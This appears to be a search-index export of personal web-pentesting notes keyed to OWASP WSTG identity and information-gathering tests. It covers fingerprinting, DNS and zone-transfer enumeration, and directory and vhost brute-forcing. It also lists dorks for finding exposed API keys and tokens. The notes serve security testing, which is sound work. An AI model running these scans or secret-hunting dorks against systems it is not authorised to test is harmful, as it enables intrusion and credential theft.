                            ID Link to Hackinglife Link to OWASP Description 8.2 WSTG-ERRH-02 Testing for Stack Traces N/A, This content has been merged into: WSTG-ERRH-01","tags":["web pentesting","WSTG-ERRH-02"]},{"location":"OWASP/WSTG-IDNT-01/","title":"Test Role Definitions","text":"

                            OWASP Web Security Testing Guide 4.2 > 3. Identity Management Testing > 3.1. Test Role Definitions

                            ID Link to Hackinglife Link to OWASP Description 3.1 WSTG-IDNT-01 Test Role Definitions - Identify and document roles used by the application. - Attempt to switch, change, or access another role. - Review the granularity of the roles and the needs behind the permissions given.

                            OWASP/WSTG-IDNT-01.md

                            ","tags":["web pentesting","WSTG-IDNT-01"]},{"location":"OWASP/WSTG-IDNT-02/","title":"Test User Registration Process","text":"

                            OWASP Web Security Testing Guide 4.2 > 3. Identity Management Testing > 3.2. Test User Registration Process

                            ID Link to Hackinglife Link to OWASP Description 3.2 WSTG-IDNT-02 Test User Registration Process - Verify that the identity requirements for user registration are aligned with business and security requirements. - Validate the registration process.","tags":["web pentesting","WSTG-IDNT-02"]},{"location":"OWASP/WSTG-IDNT-03/","title":"Test Account Provisioning Process","text":"

                            OWASP Web Security Testing Guide 4.2 > 3. Identity Management Testing > 3.3. Test Account Provisioning Process

                            ID Link to Hackinglife Link to OWASP Description 3.3 WSTG-IDNT-03 Test Account Provisioning Process - Verify which accounts may provision other accounts and of what type.","tags":["web pentesting","WSTG-IDNT-03"]},{"location":"OWASP/WSTG-IDNT-04/","title":"Testing for Account Enumeration and Guessable User Account","text":"

                            OWASP Web Security Testing Guide 4.2 > 3. Identity Management Testing > 3.4. Testing for Account Enumeration and Guessable User Account

                            ID Link to Hackinglife Link to OWASP Description 3.4 WSTG-IDNT-04 Testing for Account Enumeration and Guessable User Account - Review processes that pertain to user identification (e.g. registration, login, etc.). - Enumerate users where possible through response analysis.","tags":["web pentesting","WSTG-IDNT-04"]},{"location":"OWASP/WSTG-IDNT-05/","title":"Testing for Weak or Unenforced Username Policy","text":"

                            OWASP Web Security Testing Guide 4.2 > 3. Identity Management Testing > 3.5 Testing for Weak or Unenforced Username Policy

                            ID Link to Hackinglife Link to OWASP Description 3.5 WSTG-IDNT-05 Testing for Weak or Unenforced Username Policy - Determine whether a consistent account name structure renders the application vulnerable to account enumeration. - User account names are often highly structured (e.g. Joe Bloggs account name is jbloggs and Fred Nurks account name is fnurks) and valid account names can easily be guessed. - Determine whether the application's error messages permit account enumeration.","tags":["web pentesting","WSTG-IDNT-05"]},{"location":"OWASP/WSTG-INFO-01/","title":"Conduct search engine discovery reconnaissance for information leakage","text":"

                            OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.1. Conduct search engine discovery reconnaissance for information leakage

                            ID Link to Hackinglife Link to OWASP Objectives 1.1 WSTG-INFO-01 Conduct Search Engine Discovery Reconnaissance for Information Leakage - Identify what sensitive design and configuration information of the application, system, or organization is exposed directly (on the organization's website) or indirectly (via third-party services).

                            This is merely passive reconnaissance.

                            ","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-01/#use-multiple-search-engines","title":"Use multiple search engines","text":"
                            • Baidu
                            • Bing
                            • binsearch.info
                            • Common crawl
                            • Duckduckgo
                            • Wayback machine
• Startpage (based on Google but without trackers and logs)
                            • Shodan.
                            ","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-01/#use-operators","title":"Use operators","text":"","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-01/#google-dorks","title":"Google Dorks","text":"

                            More about google dorks.

Google Dorking Query Expected results intitle:\"api\" site: \"example.com\" Finds all publicly available API related content in a given hostname. Another cool example for API versions: inurl:\"/api/v1\" site: \"example.com\" intitle:\"json\" site: \"example.com\" Many APIs use json, so this might be a cool filter inurl:\"/wp-json/wp/v2/users\" Finds all publicly available WordPress API user directories. intitle:\"index.of\" intext:\"api.txt\" Finds publicly available API key files. inurl:\"/api/v1\" intext:\"index of /\" Finds potentially interesting API directories. intitle:\"index of\" api_key OR \"api key\" OR apiKey -pool This is one of my favorite queries. It lists potentially exposed API keys.

                            Use cache operator

                            cache:target.com\n
                            ","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-01/#github","title":"Github","text":"

More GitHub Dorking.

GitHub Dorking Query Expected results applicationName api key After getting results, filter by issue and you may find some api keys. It's common to leave api keys exposed when rebasing a git repo, for instance api_key - authorization_bearer - oauth - auth - authentication - client_secret - api_token - client_id - OTP - HOMEBREW_GITHUB_API_TOKEN - SF_USERNAME - HEROKU_API_KEY - JEKYLL_GITHUB_TOKEN - api.forecast.io - password - user_password - user_pass - passcode - client_secret - secret - password hash - user auth - extension: json nasa Results show some extensions that include json, so they might be API related shodan_api_key Results show shodan api keys \"authorization: Bearer\" This search reveals some authorization tokens. filename: swagger.json Go to the Code tab and you will find the swagger file.","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-01/#shodan","title":"Shodan","text":"

                            Go to shodan.

Shodan Dorking Query Expected results \"content-type: application/json\" This type of content is usually related to APIs \"wp-json\" If the target is using WordPress","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-01/#waybackmachine-with-waybackurls","title":"WaybackMachine with WayBackUrls","text":"

waybackurls inspects URLs saved by the Wayback Machine and looks for specific keywords. Installation:

                            go install github.com/tomnomnom/waybackurls@latest\n

                            Basic usage:

                            waybackurls -dates https://example.com > waybackurls.txt\n\ncat waybackurls.txt\n

                            Dork for API endpoints discovery:

Wayback Machine Dorking Query Expected results Path to an API We are trying to see if there is a recorded history of the API. It may provide us with endpoints that used to exist but supposedly no longer do.","tags":["web pentesting","reconnaissance","WSTG-INFO-01","dorkings"]},{"location":"OWASP/WSTG-INFO-02/","title":"Fingerprint Web Server","text":"

                            OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.2. Fingerprint Web Server

                            ID Link to Hackinglife Link to OWASP Objectives 1.2 WSTG-INFO-02 Fingerprint Web Server - Determine the version and type of a running web server to enable further discovery of any known vulnerabilities.","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-02/#passive-fingerprinting","title":"Passive fingerprinting","text":"","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-02/#whois","title":"Whois","text":"
                             whois $TARGET\n
                            whois.exe <TARGET>\n
                            ","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-02/#banner-grabbing","title":"Banner grabbing","text":"
                            • nmap.
                              # Grab banner of services in an IP\nnmap -sV --script=banner $ip\n\n# Grab banners of services in a range\nnmap -sV --script=banner $ip/24\n
                            • telnet
                            • openssl
                              openssl s_client -connect target.site:443\nHEAD / HTTP/1.0\n
                              • sending malformed request (with SANTACLAUS method for instance):
                                GET / SANTACLAUS/1.1\n
• Some targets obfuscate their servers by modifying headers, but there is a default ordering of the response headers, so you can still make guesses from the ordering.

                            ","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-02/#automatic-scanning-tools","title":"Automatic scanning tools","text":"

                            netcraft, nikto.

Netcraft can offer us information about the servers without even interacting with them, and this is something valuable from a passive information gathering point of view. We can use the service by visiting https://sitereport.netcraft.com and entering the target domain. We need to pay special attention to the latest IPs used. Sometimes we can spot the actual IP address from the webserver before it was placed behind a load balancer, web application firewall, or IDS, allowing us to connect directly to it if the configuration allows it.

                            ","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-02/#active-fingerprinting","title":"Active fingerprinting","text":"","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-02/#http-headers-and-html-source-code","title":"HTTP headers and HTML Source code","text":"
                            • Note the response header Server, X-Powered-By, or X-Generator as well.
                            • Identify framework specific cookies. For instance, the cookie CAKEPHP for php.
                            • Review the source code and identify <meta> or attributes with typical patterns from some servers (and/or frameworks).
                            nmap -sV -F target\n
                            ","tags":["web pentesting","reconnaissance","WSTG-INFO-02","dorkings"]},{"location":"OWASP/WSTG-INFO-03/","title":"Review Webserver Metafiles for Information Leakage","text":"OWASP

                            OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.3. Review Webserver Metafiles for Information Leakage

                            ID Link to Hackinglife Link to OWASP Objectives 1.3 WSTG-INFO-03 Review Webserver Metafiles for Information Leakage - Identify hidden or obfuscated paths and functionality through the analysis of metadata files (robots.txt, <META> tag, sitemap.xml) - Extract and map other information that could lead to a better understanding of the systems at hand.","tags":["web","pentesting","reconnaissance","WSTG-INFO-03"]},{"location":"OWASP/WSTG-INFO-03/#searching-for-well-known-files","title":"Searching for well-known files","text":"
                            • robots.txt
                            • sitemap.xml
• security.txt (a proposed standard which allows websites to define security policies and contact details).
• humans.txt (an initiative for knowing the people behind a website).
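
A quick sketch to check for these files with curl (example.org is a placeholder):

for f in robots.txt sitemap.xml .well-known/security.txt humans.txt; do echo \"== $f\"; curl -s -I https://example.org/$f | head -1; done\n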
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-03"]},{"location":"OWASP/WSTG-INFO-03/#examining-meta-tags","title":"Examining META tags","text":"

<META> tags are located within the HEAD section of each HTML document.

The robots directive can also be specified through the use of a specific META tag.

                            <META NAME=\"ROBOTS\" ...>\n

                            If no META tag is present, then the default is INDEX, FOLLOW.

                            Other revealing META tags.

                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-03"]},{"location":"OWASP/WSTG-INFO-03/#the-well-known-directory","title":"The .well-known/ directory","text":"

                            Some of the files are these: https://www.iana.org/assignments/well-known-uris/well-known-uris.xhtml.

                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-03"]},{"location":"OWASP/WSTG-INFO-04/","title":"Enumerate Applications on Webserver","text":"

                            OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.4. Enumerate Applications on Webserver

                            ID Link to Hackinglife Link to OWASP Objectives 1.4 WSTG-INFO-04 Enumerate Applications on Webserver - Enumerate the applications within the scope that exist on a web server. - Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers

                            Web application discovery is a process aimed at identifying web applications on a given infrastructure:

                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#1-different-based-url","title":"1. Different based URL","text":"

                            https://example.com/application1 and https://example.com/application2

                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#google-dork","title":"google dork","text":"

                            If these applications are indexed, try this google dork:

                            site:example.com\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#gobuster","title":"gobuster","text":"

                            gobuster Cheat sheet.

Brute-force directory discovery, but it's not recursive (you need to specify a directory to perform a deeper scan).

gobuster dir -u <exact target url> -w </path/dic.txt> --wildcard -b 401\n# -b: exclude a specific HTTP response code from the results\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#more-tools","title":"More tools","text":"Tool + Cheat sheet URL dirb DIRB is a web content fingerprinting tool. It scans the web server for directories using a dictionary file feroxbuster FEROXBUSTER is a web content fingerprintinf tool that uses brute force combined with a wordlist to search for unlinked content in target directories. httprint HTTPRINT is a web server fingerprinting tool. It identifies web servers and detects web enabled devices which do not have a server banner string, such as wireless access points, routers, switches, cable modems, etc. wpscan WPSCAN is a wordpress security scanner.","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#2-non-standard-ports","title":"2. Non standard ports","text":"

                            https://example.com:1234/ and https://example.com:8088/

                            nmap -Pn -sT -p0-65535 $ip\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#3-virtual-hosts","title":"3. Virtual hosts","text":"

                            https://example.com/ and https://webmail.example.com/

                            A virtual host (vHost) is a feature that allows several websites to be hosted on a single server.

                            There are two ways to configure virtual hosts:

                            • IP-based virtual hosting
                            • Name-based virtual hosting: The distinction for which domain the service was requested is made at the application level. For example, several domain names, such as admin.inlanefreight.htb and backup.inlanefreight.htb, can refer to the same IP. Internally on the server, these are separated and distinguished using different folders.
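
A minimal way to observe name-based virtual hosting is to request the same IP with different Host headers and compare the responses (the hostnames reuse the example above):

curl -s -I http://$ip -H \"Host: admin.inlanefreight.htb\" | grep \"Content-Length\"\ncurl -s -I http://$ip -H \"Host: backup.inlanefreight.htb\" | grep \"Content-Length\"\n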
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#identify-name-server","title":"Identify name server","text":"
                            host -t ns example.com\n

                            Request a zone transfer for example.com from one of its nameservers:

                            host -l example.com ns1.example.com\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#dns-enumeration","title":"DNS enumeration","text":"

                            More about DNS enumeration.

                            gobuster (More complete cheat sheet: gobuster)

                            gobuster dns -d <DOMAIN (without http)> -w /usr/share/SecLists/Discovery/DNS/namelist.txt\n

Bash script, using a SecLists wordlist:

                            for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.example.com @$ip | grep -v ';\\|SOA' | sed -r '/^\\s*$/d' | grep $sub | tee -a subdomains.txt;done\n

                            dig (More complete cheat sheet: dig)

                            # Get email of administrator of the domain\ndig soa www.example.com\n# The email will contain a (.) dot notation instead of @\n\n# ENUMERATION\n# List nameservers known for that domain\ndig ns example.com @$ip\n# -ns: other name servers are known in NS record\n#  `@` character specifies the DNS server we want to query.\n\n# View all available records\ndig any example.com @$ip\n\n# Display version. query a DNS server's version using a class CHAOS query and type TXT. However, this entry must exist on the DNS server.\ndig CH TXT version.bind $ip\n

                            nslookup (More complete cheat sheet: nslookup)

                            # Query `A` records by submitting a domain name: default behaviour\nnslookup $TARGET\n\n# We can use the `-query` parameter to search specific resource records\n# Querying: A Records for a Subdomain\nnslookup -query=A $TARGET\n\n# Querying: PTR Records for an IP Address\nnslookup -query=PTR 31.13.92.36\n\n# Querying: ANY Existing Records\nnslookup -query=ANY $TARGET\n\n# Querying: TXT Records\nnslookup -query=TXT $TARGET\n\n# Querying: MX Records\nnslookup -query=MX $TARGET\n\n#  Specify a nameserver if needed by adding `@<nameserver/IP>` to the command\n

                            DNScan (More complete cheat sheet: DNScan): Python wordlist-based DNS subdomain scanner. The script will first try to perform a zone transfer using each of the target domain's nameservers.

                            dnscan.py (-d \\<domain\\> | -l \\<list\\>) [OPTIONS]\n# Mandatory Arguments\n#    -d  --domain                              Target domain; OR\n#    -l  --list                                Newline separated file of domains to scan\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-04/#vhost-enumeration","title":"VHOST enumeration","text":"

                            vHost Fuzzing

                            # use a vhost dictionary file\ncp /usr/share/wordlists/secLists/Discovery/DNS/namelist.txt ./vhosts\n\ncat ./vhosts | while read vhost;do echo \"\\n********\\nFUZZING: ${vhost}\\n********\";curl -s -I http://$ip -H \"HOST: ${vhost}.example.com\" | grep \"Content-Length: \";done\n

                            vHost Fuzzing with ffuf:

                            # Virtual Host enumeration\n# use a vhost dictionary file\ncp /usr/share/wordlists/secLists/Discovery/DNS/namelist.txt ./vhosts\n\nffuf -w ./vhosts -u http://$ip -H \"HOST: FUZZ.example.com\" -fs 612\n# `-w`: Path to our wordlist\n# `-u`: URL we want to fuzz\n# `-H \"HOST: FUZZ.randomtarget.com\"`: This is the `HOST` Header, and the word `FUZZ` will be used as the fuzzing point.\n# `-fs 612`: Filter responses with a size of 612, default response size in this case.\n

                            gobuster (More complete cheat sheet: gobuster)

                            gobuster vhost -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u <exact target url>\n# vhost : Uses VHOST for brute-forcing\n# -w : Path to the wordlist\n# -u : Specify the URL\n

Wfuzz (More complete cheat sheet: Wfuzz):

wfuzz -c --hc 404 -t 200 -u https://nunchucks.htb/ -w /usr/share/dirb/wordlists/common.txt -H \"Host: FUZZ.nunchucks.htb\" --hl 546\n# -c: Color in output\n# --hc 404: Hide 404 code responses\n# -t 200: Concurrent Threads\n# -u http://nunchucks.htb/: Target URL\n# -w /usr/share/dirb/wordlists/common.txt: Wordlist\n# -H \"Host: FUZZ.nunchucks.htb\": Header. With \"FUZZ\" we indicate the injection point for payloads\n# --hl 546: Filter out responses with a specific number of lines. In this case, 546\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-04"]},{"location":"OWASP/WSTG-INFO-05/","title":"Review Webpage content for Information Leakage","text":"

                            OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.5. Review Webpage content for Information Leakage

                            ID Link to Hackinglife Link to OWASP Objectives 1.5 WSTG-INFO-05 Review Webpage Content for Information Leakage - Review webpage comments, metadata, and redirect bodies to find any information leakage. - Gather JavaScript files and review the JS code to better understand the application and to find any information leakage. - Identify if source map files or other front-end debug files exist.

Sensitive information can include (but is not limited to): private API keys, internal IP addresses, debugging information, sensitive routes, or even credentials.

                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-05"]},{"location":"OWASP/WSTG-INFO-05/#review-http-comments","title":"Review HTTP comments","text":"
                            <!--\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-05"]},{"location":"OWASP/WSTG-INFO-05/#review-metatags","title":"Review METAtags","text":"

They do not provide an attack vector directly, but they allow an attacker to profile an application:

                            <META name=\"Author\" content=\"John Smith\">\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-05"]},{"location":"OWASP/WSTG-INFO-05/#review-javascript-comments","title":"Review javascript comments","text":"
//\n

                            And

                            /*\n

                            And the <script> tag.

                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-05"]},{"location":"OWASP/WSTG-INFO-05/#review-source-map-files","title":"Review Source map files","text":"

Source maps can often be found by appending the .map extension to .js files.
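
A quick sketch (the path to app.js is an assumption):

# Look for a sourceMappingURL comment at the end of the JS file\ncurl -s https://example.org/static/app.js | tail -c 200\n# Then try fetching the map directly\ncurl -s https://example.org/static/app.js.map\n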

                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-05"]},{"location":"OWASP/WSTG-INFO-06/","title":"Identify Application Entry Points","text":"

                            OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.6. Identify Application Entry Points

                            ID Link to Hackinglife Link to OWASP Objectives 1.6 WSTG-INFO-06 Identify Application Entry Points - Identify possible entry and injection points through request and response analysis which covers hidden fields, parameters, methods HTTP header analysis","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-06/#workflow","title":"Workflow","text":"","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-06/#requests","title":"Requests","text":"
                            • Identify GET and POST requests.
                            • Identify parameters (hidden and not hidden, encoded and not, encrypted and not) in GET and POST requests.
                            • Identify other methods.
                            • Note additional or custom type headers
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-06/#responses","title":"Responses","text":"
                            • Identify when the \"Set-cookie\" is used, modified, added.
                            • Identify patterns in responses: when you have 200, 302, 400, 403, or 500.
                            • Pay attention to the response header \"Server.\"
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-06/#using-the-attack-surface-detector-plugin","title":"Using the Attack Surface Detector plugin","text":"

                            Download the Attack Surface Detector plugin in BurpSuite from: https://github.com/secdec/attack-surface-detector-cli/releases.

                            Run this command from the Attack Surface Detector plugin:

                            java -jar attack-surface-detector-cli-1.3.5.jar <source-code-path> [flags]\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-06/#enumeration-techniques-for-http-verbs","title":"Enumeration techniques for HTTP verbs","text":"

                            With netcat

                            # Send a OPTIONS message with netcat\nnc victim.target 80\nOPTIONS / HTTP/1.0\n

                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-06/#using-kiterunner","title":"Using Kiterunner","text":"

                            kiterunner Cheat sheet.

Kiterunner is an excellent tool that was developed and released by Assetnote. Kiterunner is currently the best tool available for discovering API endpoints and resources. While directory brute-force tools like Gobuster/Dirbuster work to discover URL paths, they typically rely on standard HTTP GET requests. Kiterunner will not only use all HTTP request methods common with APIs (GET, POST, PUT, and DELETE) but also mimic common API path structures. In other words, instead of requesting GET /api/v1/user/create, Kiterunner will try POST /api/v1/user/create, mimicking a more realistic request.

1. First, download the dictionaries from the project. In my case I downloaded them to /usr/share/wordlists/kiterunner/:

                            • https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-large.json.tar.gz
                            • https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-small.json.tar.gz
                            • https://wordlists-cdn.assetnote.io/data/kiterunner/routes-large.kite.tar.gz
                            • https://wordlists-cdn.assetnote.io/data/kiterunner/routes-small.kite.tar.gz

                            2. Run a quick scan of your target\u2019s URL or IP address like this:

kr scan http://127.0.0.1 -w ~/api/wordlists/data/kiterunner/routes-large.kite\n

Note that we conducted this scan without any authorization headers, which the target API likely requires.

                            To use a dictionary (and not a kite file):

                            kr brute <target> -w ~/api/wordlists/data/automated/nameofwordlist.txt\n

                            If you have many targets, you can save a list of line-separated targets as a text file and use that file as the target.
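
A sketch, assuming a file of line-separated targets named targets.txt:

kr scan targets.txt -w ~/api/wordlists/data/kiterunner/routes-large.kite\n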

One of the coolest Kiterunner features is the ability to replay requests. Thus, not only will you have an interesting result to investigate, you will also be able to dissect exactly why that request is interesting. To replay a request, copy the entire result line, paste it after the kb replay option, and include the wordlist you used:

                            kr kb replay \"GET     414 [    183,    7,   8]://192.168.50.35:8888/api/privatisations/count 0cf6841b1e7ac8badc6e237ab300a90ca873d571\" -w ~/api/wordlists/data/kiterunner/routes-large.kite\n

                            Running this will replay the request and provide you with the HTTP response.

To run Kiterunner with an authorization token, such as \"x-access-token\", take the full token and add it to the scan with the -H option:

                            kr scan http://IP -w /path/to/dict.txt -H 'x-access-token: eyJhGcwisdfdsfdfsdfsdfsdfdsfdsfddfdf.eyfakefakefakefaketokenfakeken._wcoooooo_kkkkkk_kkkk'\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-06"]},{"location":"OWASP/WSTG-INFO-07/","title":"Map Execution Paths through applications","text":"

                            OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.7. Map Execution Paths through applications

                            ID Link to Hackinglife Link to OWASP Objectives 1.7 WSTG-INFO-07 Map Execution Paths Through Application - Map the target application and understand the principal workflows. - Use HTTP(s) Proxy Spider/Crawler feature aligned with application walkthrough

Map the target application and understand the principal workflows (paths, data flows, and race conditions).

You may use automatic spidering tools such as Zed Attack Proxy (ZAP).

                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#spidering","title":"Spidering","text":"","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#httrack","title":"HTTRack","text":"

                            HTTRack tutorial

Create a folder and replicate your target site into it.

                            mkdir targetsite\nhttrack domain.com  targetsite/\n

                            Interactive mode:

                            httrack\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#eyewitness","title":"EyeWitness","text":"

                            EyeWitness tutorial

                            First, create a file with the target domains, like for instance, listOfdomains.txt.

                            Then, run:

                            eyewitness --web -f listOfdomains.txt -d path/to/save/\n

After that, you will get a report.html file with the requests and screenshots of those domains.

                            # Proxing the request via BurpSuite\neyewitness --web -f listOfdomains.txt -d path/to/save/ --proxy-ip 127.0.0.1 --proxy-port 8080\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#directoryfile-enumeration","title":"Directory/File enumeration","text":"","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#nmap","title":"nmap","text":"
                            nmap -sV -p80 --script=http-enum <target>\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#dirb","title":"dirb","text":"

                            Cheat sheet with dirb.

                            dirb http://domain.com /usr/share/metasploit-framework/data/wordlists/directory.txt\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#gobuster","title":"gobuster","text":"

                            Gobuster:

gobuster dir -u <exact target url> -w </path/dic.txt> -b 403,404 -x .php,.txt -r \n# -b: exclude specific HTTP response codes from the results\n# -r: follow redirects\n# -x: append these extensions to the paths provided by the dictionary\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#ffuf","title":"Ffuf","text":"

                            Ffuf:

                            ffuf -w /path/to/wordlist -u https://target/FUZZ\n\n# Assuming that the default virtualhost response size is 4242 bytes, we can filter out all the responses of that size (`-fs 4242`)while fuzzing the Host - header:\nffuf -w /path/to/vhost/wordlist -u https://target -H \"Host: FUZZ\" -fs 4242\n\n# Enumerating directories and folders:\nffuf -recursion -recursion-depth 1 -u http://$ip/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt\n# -recursion: activates the recursive scan\n# -recursion-depth 1: specifies the maximum depth to scan\n\n# fuzz a combination of folder names, with a wordlist of possible files and a dictionary of extensions\nffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://$ip/FOLDERS/WORDLISTEXTENSIONS\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#wfuzz","title":"Wfuzz","text":"

                            Wfuzz

                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-07/#feroxbuster","title":"feroxbuster","text":"

                            feroxbuster

                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-07"]},{"location":"OWASP/WSTG-INFO-08/","title":"Fingerprint Web Application Framework","text":"

                            OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.8. Fingerprint Web Application Framework

                            ID Link to Hackinglife Link to OWASP Objectives 1.8 WSTG-INFO-08 Fingerprint Web Application Framework - Fingerprint the components being used by the web applications. - Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders, Error message.","tags":["web","pentesting","reconnaissance","WSTG-INFO-08"]},{"location":"OWASP/WSTG-INFO-08/#http-headers","title":"HTTP headers","text":"
                            • Note the response header X-Powered-By, or X-Generator as well.
                            • Identify framework specific cookies. For instance, the cookie CAKEPHP for php.
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-08"]},{"location":"OWASP/WSTG-INFO-08/#html-source-code","title":"HTML source code","text":"
• The framework is often included in the META tag.
• Review header and footer sections carefully for both general and specific markers.
• Look at the typical file and folder structure. An example would be the wp-includes folder for a WordPress installation, or a CHANGELOG file for a Drupal one.
• Check out file extensions, as they sometimes reveal the underlying framework.
• Review error messages; they commonly reveal the framework.

See WSTG-INFO-07 for a reference to HTTRack (for mirroring the code) and EyeWitness. These utilities replicate the source code of the target domain.

                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-08"]},{"location":"OWASP/WSTG-INFO-08/#tools","title":"Tools","text":"

                            1. HTTP headers:

X-Powered-By and cookies: - .NET: ASPSESSIONID<RANDOM>=<COOKIE_VALUE> - PHP: PHPSESSID=<COOKIE_VALUE> - JAVA: JSESSIONID=<COOKIE_VALUE>
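
A minimal sketch for spotting these markers in the response headers (example.org is a placeholder):

curl -s -I https://example.org | grep -i -E \"set-cookie|x-powered-by\"\n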

                            2. whatweb.

                            whatweb -a3 https://www.example.com -v\n# -a3: aggression level 3\n# -v: verbose mode\n

                            3. Wappalyzer: https://www.wappalyzer.com.

                            4. wafw00f:

wafw00f -v https://www.example.com\n\n# -a: check all possible WAFs in place instead of stopping scanning at the first match.\n# -i: read targets from an input file\n# -p: proxy the requests\n

                            5. Aquatone

                            cat example_of_list.txt | aquatone -out ./aquatone -screenshot-timeout 1000\n

                            6. Addons for browsers:

                            • BuiltWith: BuiltWith\u00ae covers 93,551+ internet technologies which include analytics, advertising, hosting, CMS and many more.

                            7. Curl:

                            curl -IL https://<TARGET>\n# -I: --head (HTTP  FTP  FILE) Fetch the headers only!\n# -L, --location: (HTTP) If the server reports that the requested page has moved to a different location (indicated with a Location: header and a 3XX response  code),  this  option  will make  curl  redo the request on the new place. If used together with -i, --include or -I, --head, headers from all requested pages will be shown. \n

                            8. nmap:

                            sudo nmap -v $ip --script banner.nse\n
                            ","tags":["web","pentesting","reconnaissance","WSTG-INFO-08"]},{"location":"OWASP/WSTG-INFO-09/","title":"Fingerprint Web Applications","text":"

                            OWASP Web Security Testing Guide 4.2 > 1. Information Gathering > 1.9. Fingerprint Web Applications

                            ID Link to Hackinglife Link to OWASP Objectives 1.9 WSTG-INFO-09 Fingerprint Web Application N/A, This content has been merged into: WSTG-INFO-08

                            This content has been merged to Fingerprint Web Application Frameworks.

